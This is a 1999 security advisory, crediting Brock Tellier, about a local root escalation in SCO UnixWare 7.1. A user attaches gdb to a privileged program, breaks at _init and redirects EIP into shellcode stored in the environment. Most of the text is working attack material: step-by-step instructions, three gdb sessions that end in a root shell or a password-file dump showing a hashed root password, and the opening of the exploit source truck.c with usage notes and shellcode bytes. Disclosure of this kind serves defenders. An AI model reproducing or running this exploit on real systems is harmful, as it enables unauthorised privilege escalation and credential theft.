A flaw in SCO UnixWare's allows users to gain root
10 Dec. 1999
Summary
We already described flaws in UnixWare's privileged process system (UnixWare 7 uidadmin vulnerable to an exploitable buffer overflow). The techniques discussed here have only been tested on SCO UnixWare 7.1. While earlier versions of UW are probably affected, SCO OpenServer does not use this particular security model and are therefore not affected. These techniques allow any privileged program under UnixWare to be used as a way to gain root privileges.
Credit:
The information and the exploit code have been provided by: Brock Tellier.
SCO UnixWare's security subsystem itself, not the programs encompassed by it, has cause more compromises than any other part of the UNIX operating system. Consider that a privileged program which is simply:
void main() {
printf("secure\n");
}
Can be compromised just as readily as one that is 10000 lines of spaghetti code. The specific problem lies in the fact that any user who runs one of these privileged processes (that are not suid/sgid, but are in '/etc/security/tcb/privs') has full control over the process. By using a debugger, we can stop the program, insert registers and control program flow. Any program in the privs file that is not also suid/sgid is vulnerable to this exploit, regardless of whatever overflows and symlink vulnerabilities may or may not exist.
Exploit:
The exploit goes like this:
- Put nops+shellcode into your environment
- Load a program which gains privs in /etc/security/tcb/privs with gdb
- Set a breakpoint at _init
- Run, and when we hit that breakpoint change our eip to point into our environment
- Continue, continue, rootshell
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/ucb/w
GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x804ac34
(gdb) run
Starting program: /usr/ucb/w
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3257]
Warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x804ac34 in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x804ac34 <_init>: ret
End of assembler dump.
(gdb) info registers
eax 0x0 0
ecx 0x8 8
edx 0x804ac38 134523960
ebx 0x804644c 134505548
esp 0x804643c 134505532
ebp 0x8046440 134505536
esi 0x804bc3c 134528060
edi 0x8046454 134505556
eip 0x804ac34 134523956
eflags 0x100212 1049106
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writeable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
root:bahbapXFxhypF:10935::::::
daemon:NP:6445::::::
bin:NP:6445::::::
....
Program exited normally.
(gdb)
---- DACWRITE ----
bash-2.02$ ./truck 2
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/bin/getdev
GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x830e740
(gdb) run
Starting program: /usr/bin/getdev
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3271]
Warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x830e740 in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x830e740 <_init>: ret
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writeable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(da
emon),23(cron),25(dtadmin),47(priv),9(lp)
#
---- SETUID ----
bash-2.02$ ./truck 3
UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net
$ ./gdb /usr/ucb/lpr
GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x805036c
(gdb) run
Starting program: /usr/ucb/lpr
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3302]
Warning: shared library handler failed to enable breakpoint
Breakpoint 1, 0x805036c in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x805036c <_init>: ret
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(da
emon),23(cron),25(dtadmin),47(priv),9(lp)
#
--- truck.c ---
/**
** "Its a hole you could drive a truck through."
** -Aleph One
**
** truck.c UnixWare 7.1 security model exploit
** Demonstrates how we own privileged processes
**
** Usage: cc -o truck truck.c
** ./truck <filetype> where filetype is 1, 2 or 3
** (for dacread, dacwrite and setuid, respectively)
**
** This will put $XNEC in the environment and run a shell.
** From there you must use gdb/debug to load a file of the
** type you chose (by checking /etc/security/tcb/privs)
** and setting a breakpoint at _init via "break _init".
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
**/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
